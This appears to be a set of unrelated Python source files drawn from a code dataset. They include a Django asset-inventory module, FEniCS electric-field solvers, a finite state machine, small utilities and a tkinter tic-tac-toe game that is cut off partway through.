__create_cpu_info(self):\r\n\r\n # self._field_verify(self.clean_data, \"model\", \"str\")\r\n self._field_verify(self.clean_data[\"cpu\"], \"cpu_count\", int)\r\n\r\n self._field_verify(self.clean_data[\"cpu\"], \"cpu_core_count\", int)\r\n\r\n if not self.response.error:\r\n try:\r\n cpu_dict={\r\n \"asset_id\":self.clean_data[\"asset_id\"],\r\n \"model\":self.clean_data[\"cpu\"][\"model\"],\r\n \"cpu_count\":self.clean_data[\"cpu\"][\"cpu_count\"],\r\n \"cpu_core_count\":self.clean_data[\"cpu\"][\"cpu_core_count\"],\r\n }\r\n\r\n obj=models.CPU(**cpu_dict)\r\n obj.save()\r\n except Exception as e:\r\n self.response.info_error(403, e.args)\r\n\r\n def __create_ram_info(self):\r\n\r\n\r\n for ram in self.clean_data[\"ram\"]:\r\n # self._field_verify(ram, \"model\", \"str\")\r\n self._field_verify(ram, \"slot\", str)\r\n self._field_verify(ram, \"capacity\", int)\r\n if not self.response.error:\r\n try:\r\n ram_dict={\r\n \"asset_id\": self.clean_data[\"asset_id\"],\r\n \"sn\": ram[\"sn\"],\r\n \"model\": ram[\"model\"],\r\n \"manufacturer\": ram[\"manufacturer\"],\r\n \"slot\": ram[\"slot\"],\r\n \"capacity\": ram[\"capacity\"],\r\n }\r\n obj=models.RAM(**ram_dict)\r\n obj.save()\r\n except Exception as e:\r\n self.response.info_error(403, e.args)\r\n else:\r\n return False\r\n\r\n def __create_nic_info(self):\r\n print(self.clean_data[\"nic\"])\r\n for nic in self.clean_data[\"nic\"]:\r\n self._field_verify(nic, \"mac_address\", str)\r\n if not self.response.error:\r\n try:\r\n nic_dict={\r\n \"asset_id\": self.clean_data[\"asset_id\"],\r\n \"mac_address\":nic[\"mac_address\"],\r\n \"ip_address\":nic[\"ip_address\"],\r\n \"sn\":nic[\"sn\"],\r\n \"model\":nic[\"model\"],\r\n \"slot\":nic[\"slot\"],\r\n }\r\n print(nic_dict)\r\n obj=models.NetworkCard(**nic_dict)\r\n obj.save()\r\n except Exception as e:\r\n self.response.info_error(403, e.args)\r\n else:\r\n return False\r\n\r\n\r\n\r\n\r\n def __create_disk_info(self):\r\n for disk in self.clean_data[\"disk\"]:\r\n self._field_verify(disk, \"sn\", str)\r\n self._field_verify(disk, \"slot\", str)\r\n self._field_verify(disk, \"capacity\", int)\r\n if not self.response.error:\r\n try:\r\n disk_dict={\r\n \"asset_id\": self.clean_data[\"asset_id\"],\r\n \"sn\": disk[\"sn\"],\r\n \"model\": disk[\"model\"],\r\n \"manufacturer\": disk[\"manufacturer\"],\r\n \"capacity\": disk[\"capacity\"],\r\n \"slot\": disk[\"slot\"],\r\n \"iface_type\": disk[\"capacity\"],\r\n }\r\n print(disk_dict)\r\n obj=models.Disk(**disk_dict)\r\n obj.save()\r\n except Exception as e:\r\n self.response.info_error(403, e.args)\r\n else:\r\n return False\r\n\r\ndef log_handler(asset_obj, event_name, user, detail, component=None):\r\n '''\r\n\r\n :param asset_obj: 资产\r\n :param event_name: 事件类型\r\n :param user: 事件用户\r\n :param detail: 事件详情\r\n :param component: 资产零件\r\n :return:\r\n '''\r\n ''' (1,u'硬件变更'),\r\n (2,u'新增配件'),\r\n (3,u'设备下线'),\r\n (4,u'设备上线'),'''\r\n log_catelog = {\r\n 1: ['FieldChanged', 'HardwareChanges'],\r\n 2: ['NewComponentAdded'],\r\n }\r\n if not user.id:\r\n #user = models.UserProfile.objects.filter(is_superuser=True).last()\r\n user = models.UserProfile.objects.last()\r\n\r\n print(\"user--------->\",user)\r\n event_type = None\r\n for k, v in log_catelog.items():\r\n if event_name in v:\r\n event_type = k\r\n break\r\n log_obj = models.EventLog(\r\n name=event_name,\r\n event_type=event_type,\r\n asset_id=asset_obj.id,\r\n component=component,\r\n detail=detail,\r\n user_id=user.id\r\n )\r\n\r\n log_obj.save()\r\n\r\n\r\n\r\n\r\n\r\n\r\n","sub_path":"asset/core.py","file_name":"core.py","file_ext":"py","file_size_in_byte":21533,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"529212413","text":"import csv\ndef save_to_file(jobs, word, option):\n print(\"I am in \")\n file = open(f\"{word}_jobs_in_ON_from_{option}.csv\", \"w\", -1,\"utf-8\", newline='')\n writer = csv.writer(file)\n writer.writerow(['number', 'title', 'company', 'location', 'link'])\n i = 0\n while i < len(jobs):\n jobList = list(jobs[i].values())\n writer.writerow([i+1, jobs[i]['title'], jobs[i]['company'], jobs[i]['location'], jobs[i]['link']])\n i += 1\n return \n","sub_path":"exporter.py","file_name":"exporter.py","file_ext":"py","file_size_in_byte":465,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"346993198","text":"from __future__ import unicode_literals\n\ndef split_simple(text, sep):\n from io import StringIO\n b = StringIO()\n i = iter(text)\n try:\n for c in i:\n if c == '\\\\':\n b.write(next(i))\n elif c == sep:\n yield b.getvalue()\n b.seek(0)\n b.truncate(0)\n else:\n b.write(c)\n except StopIteration:\n pass\n last = b.getvalue()\n if last:\n yield last\n","sub_path":"x19290/lib/splitsimple.py","file_name":"splitsimple.py","file_ext":"py","file_size_in_byte":482,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"232041812","text":"# -*- encoding: utf-8 -*-\r\n'''\r\n@Description: Calculate the weighting potential and electric field wiht fenics \r\n@Date : 2021/08/31 15:04:25\r\n@Author : tanyuhang\r\n@version : 1.0\r\n'''\r\n\r\nimport fenics\r\nimport mshr\r\nimport sys\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\n\r\n\r\n#Calculate the weighting potential and electric field\r\nclass FenicsCal:\r\n\r\n def __init__(self,my_d,fen_dic):\r\n self.p_electric = []\r\n self.w_p_electric = []\r\n self.det_model = fen_dic['name']\r\n self.fl_x=my_d.l_x/fen_dic['xyscale'] \r\n self.fl_y=my_d.l_y/fen_dic['xyscale'] \r\n self.fl_z=my_d.l_z\r\n self.tol = 1e-14\r\n m_sensor_box=self.fenics_space(my_d) \r\n self.mesh3D = mshr.generate_mesh(m_sensor_box,fen_dic['mesh']) \r\n self.V = fenics.FunctionSpace(self.mesh3D, 'P', 1)\r\n self.fenics_p_electric(my_d)\r\n self.fenics_p_w_electric(my_d)\r\n\r\n def fenics_space(self,my_d):\r\n \"\"\"\r\n @description: \r\n Define the fenics solver space \r\n @param:\r\n None\r\n @Returns:\r\n Fenics Box structure\r\n @Modify:\r\n 2021/08/31\r\n \"\"\"\r\n if \"plugin3D\" in self.det_model:\r\n self.sensor_range_confirm(my_d)\r\n m_sensor = mshr.Box(fenics.Point(self.sx_l,self.sy_l, 0), \r\n fenics.Point(self.sx_r,self.sy_r, self.fl_z))\r\n for i in range(len(my_d.e_tr)):\r\n e_t_i = my_d.e_tr[i]\r\n elec_n=mshr.Cylinder(fenics.Point(e_t_i[0],e_t_i[1],e_t_i[3]), \r\n fenics.Point(e_t_i[0],e_t_i[1],e_t_i[4]),\r\n e_t_i[2],e_t_i[2])\r\n m_sensor =m_sensor - elec_n \r\n elif \"planar3D\" in self.det_model:\r\n m_sensor = mshr.Box(fenics.Point(0, 0, 0), \r\n fenics.Point(self.fl_x, self.fl_y, self.fl_z))\r\n else:\r\n print(\"sensor model is wrrong\")\r\n sys.exit()\r\n return m_sensor \r\n \r\n def sensor_range_confirm(self,my_d):\r\n \"\"\"\r\n @description:\r\n confirm the sensor range \r\n at x,y axias to avoide the the big sensor size\r\n which will lead to the mesh complicate \r\n @param:\r\n xv_min - fenics sensor x left value\r\n xv_max - fenics sensor x right value\r\n yv_min - fenics sensor y left value\r\n yv_max - fenics sensor y right value \r\n @Modify:\r\n 2021/08/31\r\n \"\"\" \r\n xv_list=[]\r\n yv_list=[]\r\n rest_length=50 #um\r\n length=0\r\n for i in range(len(my_d.e_tr)):\r\n e_t_i = my_d.e_tr[i]\r\n xv_list.append(e_t_i[0])\r\n yv_list.append(e_t_i[1])\r\n ele_radius= e_t_i[2]\r\n while length == 0:\r\n xv_max = max(xv_list)+ele_radius+rest_length \r\n xv_min = min(xv_list)-ele_radius-rest_length \r\n yv_max = max(yv_list)+ele_radius+rest_length\r\n yv_min = min(yv_list)-ele_radius-rest_length \r\n if xv_max >= yv_max:\r\n yv_max = xv_max\r\n else:\r\n xv_max = yv_max\r\n if xv_min <= yv_min:\r\n yv_min = xv_min\r\n else:\r\n xv_min = yv_min\r\n if (xv_max > my_d.l_x or xv_min <0 \r\n or yv_max > my_d.l_y or yv_min < 0):\r\n rest_length -= 1\r\n else:\r\n length=1\r\n self.sx_l=xv_min \r\n self.sx_r=xv_max \r\n self.sy_l=yv_min \r\n self.sy_r=yv_max \r\n\r\n def fenics_p_electric(self,my_d): \r\n \"\"\"\r\n @description:\r\n Solve poisson equation to get potential and electric field\r\n @Modify:\r\n 2021/08/31\r\n \"\"\"\r\n if \"plugin3D\" in self.det_model:\r\n bc_l=[]\r\n bc_l = self.boundary_definition_3D(my_d,\"Possion\") \r\n elif \"planar3D\" in self.det_model:\r\n bc_l = self.boundary_definition_2D(my_d,\"Possion\")\r\n\r\n u = fenics.TrialFunction(self.V)\r\n v = fenics.TestFunction(self.V)\r\n f = fenics.Constant(self.f_value(my_d))\r\n a = fenics.dot(fenics.grad(u), fenics.grad(v))*fenics.dx\r\n L = f*v*fenics.dx\r\n # Compute solution\r\n self.u = fenics.Function(self.V)\r\n fenics.solve(a == L, self.u, bc_l,\r\n solver_parameters=dict(linear_solver='gmres',\r\n preconditioner='ilu'))\r\n #calculate electric field\r\n W = fenics.VectorFunctionSpace(self.mesh3D, 'P', 1)\r\n self.E_field = fenics.project(fenics.as_vector((self.u.dx(0),\r\n self.u.dx(1),\r\n self.u.dx(2))),W)\r\n\r\n def fenics_p_w_electric(self,my_d): \r\n \"\"\"\r\n @description:\r\n Solve Laplace equation to \r\n get weighting potential and weighting electric field\r\n @Modify:\r\n 2021/08/31\r\n \"\"\"\r\n if \"plugin3D\" in self.det_model:\r\n bc_l = []\r\n bc_l = self.boundary_definition_3D(my_d,\"Laplace\")\r\n elif \"planar3D\" in self.det_model:\r\n bc_l = self.boundary_definition_2D(my_d,\"Laplace\")\r\n # Define variational problem\r\n u_w = fenics.TrialFunction(self.V)\r\n v_w = fenics.TestFunction(self.V)\r\n f_w = fenics.Constant(0)\r\n a_w = fenics.dot(fenics.grad(u_w), fenics.grad(v_w))*fenics.dx\r\n L_w = f_w*v_w*fenics.dx\r\n # Compute solution\r\n self.u_w = fenics.Function(self.V)\r\n fenics.solve(a_w == L_w, self.u_w, bc_l)\r\n\r\n def boundary_definition_3D(self,my_d,model):\r\n \"\"\"\r\n @description:\r\n Get boundary definition of 3D detector with Possion and Laplace\r\n @Modify:\r\n 2021/08/31\r\n \"\"\"\r\n bc_l = []\r\n p_ele,n_ele=self.model_para(my_d,model)\r\n for i in range (len(my_d.e_tr)):\r\n e_i = my_d.e_tr[i]\r\n str_e = \"x[0]>={e_0}-{e_2} && x[0]<={e_0}+\"\\\r\n +\"{e_2} && x[1]>={e_1}-{e_2} && \"\\\r\n +\"x[1]<={e_1}+{e_2} && x[2]>={e_3} \\\r\n && x[2]<={e_4} && on_boundary\"\r\n elec_p = str_e.format(e_0=e_i[0], e_1=e_i[1],\r\n e_2=e_i[2], e_3=e_i[3],\r\n e_4=e_i[4])\r\n if e_i[5] == \"p\":\r\n bc = fenics.DirichletBC(self.V, p_ele, elec_p)\r\n else:\r\n bc = fenics.DirichletBC(self.V, n_ele, elec_p)\r\n bc_l.append(bc)\r\n return bc_l\r\n\r\n def boundary_definition_2D(self,my_d,model):\r\n \"\"\"\r\n @description:\r\n Get boundary definition of 2D detector with Possion and Laplace\r\n @Modify:\r\n 2021/08/31\r\n \"\"\"\r\n p_ele,n_ele=self.model_para(my_d,model)\r\n u_D = fenics.Expression('x[2] self.sx_r \r\n or py < self.sy_l or py > self.sy_r):\r\n out_range=True\r\n else:\r\n out_range=False\r\n elif \"planar3D\" in self.det_model:\r\n out_range=False\r\n return out_range\r\n \r\n def __del__(self):\r\n pass\r\n\r\n\r\nclass FenicsCal2D:\r\n\r\n def __init__(self,det):\r\n \r\n self.det = det\r\n\r\n # poential & field\r\n self.potential_value_2d = []\r\n \r\n self.electric_field_x_position = [ [] for n in range(self.det.ny+1) ]\r\n self.electric_field_y_position = [ [] for n in range(self.det.ny) ]\r\n\r\n # weighting poential & weighting field\r\n self.weighting_potential_value_2d = []\r\n \r\n self.weighting_electric_field_x_value = [ [] for n in range(self.det.ny+1) ]\r\n self.weighting_electric_field_y_value = [ [] for n in range(self.det.ny) ]\r\n\r\n self.weighting_electric_field_x_position = [ [] for n in range(self.det.ny+1) ]\r\n self.weighting_electric_field_y_position = [ [] for n in range(self.det.ny) ]\r\n\r\n self.solve()\r\n #self.draw()\r\n\r\n def cal_possion(self):\r\n \r\n width = self.det.det_width\r\n thin = self.det.det_thin\r\n \r\n nx = self.det.nx\r\n ny = self.det.ny\r\n\r\n # Create mesh and function space\r\n mesh = fenics.RectangleMesh(fenics.Point(0, 0), fenics.Point(width, thin), nx, ny)\r\n V = fenics.FunctionSpace(mesh, \"P\", 1)\r\n\r\n # Define boundary condition\r\n u_D = fenics.Expression('x[1] < tol? det_voltage : 0', degree = 2,tol = 1E-14,det_voltage = self.det.bias_voltage)\r\n\r\n def boundary(x, on_boundary):\r\n return abs(x[1])<1E-14 or abs(x[1]-thin)<1E-14\r\n\r\n bc = fenics.DirichletBC(V, u_D, boundary)\r\n\r\n # Define variational problem\r\n u = fenics.TrialFunction(V)\r\n v = fenics.TestFunction(V)\r\n\r\n f = fenics.Expression(self.det.doping_epr,degree=2)\r\n a = fenics.dot(fenics.grad(u), fenics.grad(v))*fenics.dx\r\n L = f*v*fenics.dx #+ g*v*ds\r\n\r\n # Compute solution\r\n u = fenics.Function(V)\r\n fenics.solve(a == L, u, bc)\r\n\r\n potential_value_1d = u.compute_vertex_values()\r\n potential_value_2d = np.array(potential_value_1d).reshape(ny+1,nx+1)\r\n\r\n self.potential_value_2d = potential_value_2d\r\n self.potential_value_1d = potential_value_1d\r\n\r\n # print(self.potential_value_2d)\r\n\r\n\r\n def cal_weighting_possion(self):\r\n\r\n width = self.det.det_width\r\n thin = self.det.det_thin\r\n \r\n nx = self.det.nx\r\n ny = self.det.ny\r\n\r\n # Create mesh and function space\r\n mesh = fenics.RectangleMesh(fenics.Point(0, 0), fenics.Point(width, thin), nx, ny)\r\n V = fenics.FunctionSpace(mesh, \"P\", 1)\r\n\r\n # Define boundary condition\r\n u_D = fenics.Expression('x[1] < tol? det_voltage : 0', degree = 2,tol = 1E-14,det_voltage = self.det.bias_voltage/abs(self.det.bias_voltage))\r\n\r\n def boundary(x, on_boundary):\r\n return abs(x[1])<1E-14 or abs(x[1]-thin)<1E-14\r\n\r\n bc = fenics.DirichletBC(V, u_D, boundary)\r\n\r\n # Define variational problem\r\n u = fenics.TrialFunction(V)\r\n v = fenics.TestFunction(V)\r\n\r\n f = fenics.Constant(0)\r\n a = fenics.dot(fenics.grad(u), fenics.grad(v))*fenics.dx\r\n L = f*v*fenics.dx #+ g*v*ds\r\n\r\n # Compute solution\r\n u = fenics.Function(V)\r\n fenics.solve(a == L, u, bc)\r\n\r\n weighting_potential_value_1d = u.compute_vertex_values()\r\n weighting_potential_value_2d = np.array(weighting_potential_value_1d).reshape(ny+1,nx+1)\r\n\r\n self.weighting_potential_value_2d = weighting_potential_value_2d\r\n self.weighting_potential_value_1d = weighting_potential_value_1d\r\n\r\n return weighting_potential_value_1d\r\n\r\n def cal_electric_field(self):\r\n\r\n width = self.det.det_width\r\n thin = self.det.det_thin\r\n \r\n nx = self.det.nx+1\r\n ny = self.det.ny+1\r\n\r\n x_step = width/nx\r\n y_step = thin/ny\r\n\r\n self.p_w_electric = [ [] for n in range(nx) ]\r\n self.p_electric = [ [] for n in range(nx) ]\r\n self.x_position = [ [] for n in range(nx) ]\r\n self.y_position = [ [] for n in range(nx) ]\r\n\r\n for j in range(ny):\r\n for i in range(nx):\r\n self.x_position[i].append(x_step*(i))\r\n self.y_position[i].append(y_step*(j))\r\n if (j==0):\r\n self.p_w_electric[i].append(0)\r\n self.p_electric[i].append(self.det.bias_voltage)\r\n elif(j==ny-1):\r\n self.p_w_electric[i].append(1)\r\n self.p_electric[i].append(0)\r\n else:\r\n self.p_w_electric[i].append(self.weighting_potential_value_1d[i+j*nx])\r\n self.p_electric[i].append(self.potential_value_1d[i+j*nx])\r\n\r\n def cal_field(self):\r\n\r\n nx = self.det.nx\r\n ny = self.det.ny\r\n\r\n width = self.det.det_width\r\n thin = self.det.det_thin\r\n\r\n x_step = width/nx\r\n y_step = thin/ny\r\n\r\n self.electric_field_x_position = [[]for n in range(nx)]\r\n self.electric_field_y_position = [[]for n in range(nx)]\r\n self.electric_field_x_value = [[]for n in range(nx)]\r\n self.electric_field_y_value = [[]for n in range(nx)]\r\n\r\n for j in range(ny):\r\n for i in range(nx):\r\n self.electric_field_x_position[i].append(0.5*x_step*(2*i+1))\r\n self.electric_field_y_position[i].append(0.5*y_step*(2*j+1))\r\n self.electric_field_x_value[i].append((self.p_electric[i+1][j]-self.p_electric[i][j])/x_step)\r\n self.electric_field_y_value[i].append((self.p_electric[i][j+1]-self.p_electric[i][j])/y_step)\r\n\r\n def cal_point_field(self,px_point,py_point,input_value):\r\n\r\n width = self.det.det_width\r\n thin = self.det.det_thin\r\n \r\n nx = self.det.nx\r\n ny = self.det.ny\r\n\r\n x_step = width/nx\r\n y_step = thin/ny\r\n\r\n #Interpolation method \r\n rex_value=px_point%x_step\r\n nx_value=int(px_point/x_step)\r\n rey_value=py_point%y_step\r\n ny_value=int(py_point/y_step)\r\n\r\n if(rex_value>x_step/2):\r\n e_v_x1=rex_value-x_step/2\r\n nx1_v=nx_value\r\n nx2_v=nx_value+1\r\n else:\r\n e_v_x1=rex_value+x_step/2\r\n e_v_x2=x_step-e_v_x1\r\n nx1_v=nx_value-1\r\n nx2_v=nx_value\r\n\r\n if(rey_value>y_step/2):\r\n e_v_y1=rey_value-y_step/2\r\n ny1_v=ny_value\r\n ny2_v=ny_value+1\r\n else:\r\n e_v_y1=rey_value+y_step/2\r\n e_v_y2=y_step-e_v_y1\r\n ny1_v=ny_value-1\r\n ny2_v=ny_value\r\n\r\n if (nx_value<=0):\r\n r_u=0\r\n nx1_v=nx2_v\r\n elif (nx_value>=nx-1):\r\n r_u=0\r\n nx2_v=nx1_v\r\n else:\r\n r_u=e_v_x1/x_step\r\n\r\n if (ny_value<=0):\r\n r_t=0\r\n ny1_v=ny2_v\r\n elif (ny_value>=ny-1):\r\n r_t=0\r\n ny2_v=ny1_v\r\n else:\r\n r_t=e_v_y1/y_step\r\n\r\n value_11=input_value[nx1_v][ny1_v]\r\n value_21=input_value[nx1_v][ny2_v]\r\n value_12=input_value[nx1_v][ny1_v]\r\n value_22=input_value[nx1_v][ny2_v]\r\n out_field=0.0\r\n out_field=(1-r_u)*(1-r_t)*value_11\r\n out_field+=r_u*(1-r_t)*value_21\r\n out_field+=r_u*r_t*value_22\r\n out_field+=(1-r_u)*r_t*value_12\r\n\r\n return out_field \r\n\r\n\r\n def solve(self):\r\n\r\n self.cal_possion()\r\n self.cal_weighting_possion()\r\n self.cal_electric_field()\r\n self.cal_field()\r\n\r\n def draw(self):\r\n\r\n cutline = int(self.det.nx/2.0)\r\n\r\n plt.figure(figsize=(20,20))\r\n\r\n plt.subplot(2,2,1)\r\n plt.title('Electric field')\r\n plt.xlabel('depth [um]')\r\n plt.ylabel('Electric field [V/um]')\r\n plt.plot(self.electric_field_y_position[cutline],self.electric_field_y_value[cutline])\r\n\r\n plt.subplot(2,2,2)\r\n plt.title('Electric field')\r\n plt.xlabel('X [um]')\r\n plt.ylabel('Electric field [V/um]')\r\n plt.plot(self.electric_field_x_position[1],self.electric_field_x_value[1])\r\n\r\n plt.subplot(2,2,3)\r\n plt.title('weighting potential')\r\n plt.xlabel('depth [um]')\r\n plt.ylabel('Electric potential [V]')\r\n plt.plot(self.y_position[0], self.p_w_electric[0])\r\n\r\n plt.subplot(2,2,4)\r\n plt.title('potential')\r\n plt.xlabel('depth [um]')\r\n plt.ylabel('Electric potential [V]')\r\n plt.plot(self.y_position[0], self.p_electric[0])\r\n\r\n plt.savefig(\"electric_field.pdf\")\r\n","sub_path":"raser/pyfenics.py","file_name":"pyfenics.py","file_ext":"py","file_size_in_byte":20064,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"359652273","text":"import itertools\n\n\nclass Transition:\n \"\"\"\n A transition between two states.\n \"\"\"\n\n def __init__(self, source, target, condition):\n \"\"\"\n Create a new transition with the given name a source state to a target\n state that is only valid given the provided condition.\n \"\"\"\n\n self.source = source\n self.target = target\n self.condition = condition\n\n def is_valid(self, data):\n \"\"\"\n Check if this transition should occur for the given input data using\n the stored condition.\n \"\"\"\n\n # evaluate the condition\n return self.condition(data)\n\n def __repr__(self):\n \"\"\"\n Get the string representation of the transition.\n \"\"\"\n\n return \"\".format(\n self.source,\n self.target)\n\n\nclass StateMachine:\n \"\"\"\n A finite state machine.\n \"\"\"\n\n def __init__(self, states, initial_state, transitions):\n \"\"\"\n Create a finite state machine with the given states, initial state,\n and state transitions.\n \"\"\"\n\n # create a set of valid and transition states\n valid_states = set(states)\n transition_states = set(itertools.chain.from_iterable(\n [[t.source, t.target] for t in transitions]))\n\n # verify the initial state is valid\n if initial_state not in valid_states:\n raise ValueError(\"invalid initial state: {0}\".format(\n initial_state))\n\n # verify all transitions reference valid states\n if not transition_states.issubset(valid_states):\n raise ValueError(\"invalid transition states: {0}\".format(\n \", \".join(valid_states - transition_states)))\n\n # store the states and their transitions\n self.states = {\n state: [t for t in transitions if state == t.source]\n for state in valid_states}\n\n # initialize the current state\n self.current_state = initial_state\n\n @property\n def end_states(self):\n \"\"\"\n Get a list of states with no outgoing transitions.\n \"\"\"\n\n return [s for s in self.states if not self.states[s]]\n\n def process_input(self, data):\n \"\"\"\n Process the input data to change the current state. All the transitions\n available from the current state are checked for validity and the valid\n one is processed. If there are zero or more than one valid transitions\n an error is raised.\n \"\"\"\n\n # determine valid transitions from this state\n valid_transitions = [\n t for t in self.states[self.current_state]\n if t.is_valid(data)]\n\n # corner case: no valid transitions\n if not valid_transitions:\n raise RuntimeError(\"no valid transitions\")\n\n # corner case: more than one valid transition\n if len(valid_transitions) > 1:\n raise RuntimeError(\"multiple valid transitions\")\n\n # execute the transition\n transition = valid_transitions.pop()\n self.current_state = transition.target\n","sub_path":"Core/cse3341/fsm.py","file_name":"fsm.py","file_ext":"py","file_size_in_byte":3110,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"541558045","text":"#The following program is to convert degree celsius into degree fahrenheit.\n#In case you don't know,they both are measures of temperature.\n#The relation between Celsius and fahrenheit is given by:\n#Degree_Fahrenheit=(9/5*Degree_Celsius)+32\n#Now lets' calculate the following.\n#NOTE::Here we are using formatting to format the way we want to output the temperature.\n#Syntax for forrmatting a floating point number(upto x digits after decimal):\n#print(format('Number','.xf')\n\nCelsius=float(input('Enter temperature in celsius'))\nfahrenheit=9/5*Celsius+32\nprint(\"Degree in fahrenheit is\",format(fahrenheit,'.1f'))\n\n#OUTPUT:\n#>>> Enter temperature in celsius37.8\n#Degree in fahrenheit is 100.0\n","sub_path":"2.Data and expressions/2.Celsius_to_Fahrenheit.py","file_name":"2.Celsius_to_Fahrenheit.py","file_ext":"py","file_size_in_byte":690,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"243751560","text":"import time, os, sys\nfrom msvcrt import getch\n\n\ndef clrscr(wait=True):\n if wait is True:\n time.sleep(0.5)\n print('Для продолжения нажмите любую кнопку...')\n if ord(getch()) > 0:\n os.system('cls')\n\n\ndef println(lines):\n if type(lines) == tuple:\n for line in lines:\n for ch in line:\n time.sleep(0.03)\n sys.stdout.write(ch)\n sys.stdout.flush()\n time.sleep(0.1)\n print(' ')\n else:\n for ch in lines:\n time.sleep(0.03)\n sys.stdout.write(ch)\n sys.stdout.flush()\n time.sleep(0.1)\n print(' ')\n\n\ndef printc(commands):\n for key in commands:\n print(str(key) + ') ' + commands[key])\n while True:\n try:\n command = int(input('>>>'))\n except ValueError:\n command = 0\n\n if command in commands.keys():\n break\n else:\n println('Недопустимый ввод')\n println('[' + str(commands[command]) + ']')\n return command\n","sub_path":"game/UI.py","file_name":"UI.py","file_ext":"py","file_size_in_byte":1104,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"624231203","text":"import pandas as pd\r\n\r\n# courses_path = \"C:/Users/TK/Desktop/WCC Dashboard/Courses.xlsx\"\r\ncourses_path = \"/Users/mengyaohuang/Documents/Michigan/WCC Dashboard project/Dataset/Courses.xlsx\"\r\nCourses_data = pd.read_excel(courses_path)\r\n\r\n# summary overall college level data\r\nCourses_data['SuccessPIDM'] = Courses_data['CountOfPIDM'] * Courses_data['Succ']\r\navailable_semester_options = ['Fall', 'Sp/Su', 'Winter']\r\ncompleted_academic_year = list(Courses_data['AcadYr'].unique())","sub_path":"Dashboard/Dashboard DBC/courses_data_processing.py","file_name":"courses_data_processing.py","file_ext":"py","file_size_in_byte":477,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"246819205","text":"# -*- coding: utf-8 -*-\n\"\"\"Manage user sessions\n\n:copyright: Copyright (c) 2022 RadiaSoft LLC. All Rights Reserved.\n:license: http://www.apache.org/licenses/LICENSE-2.0.html\n\"\"\"\nfrom pykern.pkdebug import pkdp, pkdlog, pkdexc\nfrom pykern.pkcollections import PKDict\nimport contextlib\nimport datetime\nimport sirepo.quest\nimport sirepo.srtime\nimport threading\n\n_REFRESH_SESSION = datetime.timedelta(seconds=5 * 60)\n\n_DB = PKDict()\n\n_initialized = None\n\n#: Lock for operations across Sirepo (server)\n_THREAD_LOCK = None\n\n\ndef init_module(want_flask):\n global _initialized, _cfg, _THREAD_LOCK\n if _initialized:\n return\n _THREAD_LOCK = threading.RLock() if want_flask else contextlib.nullcontext()\n _initialized = True\n\n\nasync def init_quest(qcall):\n async def _begin():\n try:\n (await qcall.call_api(\"beginSession\")).destroy()\n except Exception as e:\n pkdlog(\"error={} trying api_beginSession stack={}\", e, pkdexc())\n\n def _check():\n u = qcall.auth.logged_in_user(check_path=False)\n t = sirepo.srtime.utc_now()\n s = _DB.get(u)\n if s:\n if t - s.request_time < _REFRESH_SESSION:\n return False\n with _THREAD_LOCK:\n s.request_time = t\n else:\n s = PKDict(request_time=t)\n with _THREAD_LOCK:\n _DB[u] = s\n return True\n\n if qcall.sreq.method_is_post() and qcall.auth.is_logged_in() and _check():\n await _begin()\n","sub_path":"sirepo/spa_session.py","file_name":"spa_session.py","file_ext":"py","file_size_in_byte":1502,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"133624496","text":"from tkinter import *\nimport tkinter.messagebox as msg\n\nroot= Tk()\nroot.title('TIC-TAC-TOE---Raniyer')\n\ndigits = [1,2,3,4,5,6,7,8,9]\n\nmark = ''\ncount = 0\npanels = ['panel']*10\n\ndef win(panels, sign):\n\t\n\tif ((panels[1] == panels[2] == panels[3] == sign)\n\t\tor (panels[1] == panels[4] == panels[7] == sign)\n\t\tor (panels[2] == panels[5] == panels[8] == sign)\n\t\tor (panels[3] == panels[5] == panels[7] == sign)\n\t\tor (panels[3] == panels[6] == panels[9] == sign)\n\t\tor (panels[4] == panels[5] == panels[6] == sign)\n\t\tor (panels[7] == panels[8] == panels[9] == sign)):\n\t\tif (sign=='X'):\n\t\t\tmsg.showinfo(\"Result\", \"Player1 wins\")\n\t\t\troot.destroy()\n\t\tif(win(panels, sign) and sign=='O'):\n\t\t\tmsg.showinfo(\"Result\", \"Player2 wins\")\n\t\t\troot.destroy()\n\treturn\n\t\t\ndef checker(digit):\n\tglobal count, mark, digits\n\tif digit in digits:\n\t\tdigits.remove(digit)\n\t\tif count%2 == 0:\n\t\t\tmark = 'X'\n\t\telif count%2!=0: \n\t\t\tmark = 'O'\n\t\tpanels[digit] = mark\n\t\tif digit == 1:\n\t\t\tbutton1.config(text = mark)\n\t\telif digit == 2:\n\t\t\tbutton2.config(text = mark)\n\t\telif digit == 3:\n\t\t\tbutton3.config(text = mark)\n\t\telif digit == 4:\n\t\t\tbutton4.config(text = mark)\n\t\telif digit == 5:\n\t\t\tbutton5.config(text = mark)\n\t\telif digit == 6:\n\t\t\tbutton6.config(text = mark)\n\t\telif digit == 7:\n\t\t\tbutton7.config(text = mark)\n\t\telif digit == 8:\n\t\t\tbutton8.config(text = mark)\n\t\telif digit == 9:\n\t\t\tbutton9.config(text = mark)\n\t\t\n\t\tcount += 1\n\t\tsign = mark\n\t\twin(panels, sign)\n\tif (count > 8 and win(panels,'X')==False and win(panels,'O')==False):\n \tmsg.showinfo(\"Result\",\"Match Tied\")\n \troot.destroy()\n\treturn\n\nLabel(root, text = \"Player1 : X\", font = \"times 15\").grid(row = 0, column = 1)\nLabel(root, text = \"Player2 : O\", font = \"times 15\").grid(row = 0, column = 2)\nbutton1=Button(root, width = 15, font = \"Times 16 bold\", height = 7, command=lambda:checker(1))\nbutton1.grid(row = 1, column = 1)\nbutton2=Button(root, width = 15, font = \"Times 16 bold\", height = 7, command=lambda:checker(2))\nbutton2.grid(row = 1, column = 2)\nbutton3=Button(root, width = 15, font = \"Times 16 bold\", height = 7, command=lambda:checker(3))\nbutton3.grid(row = 1, column = 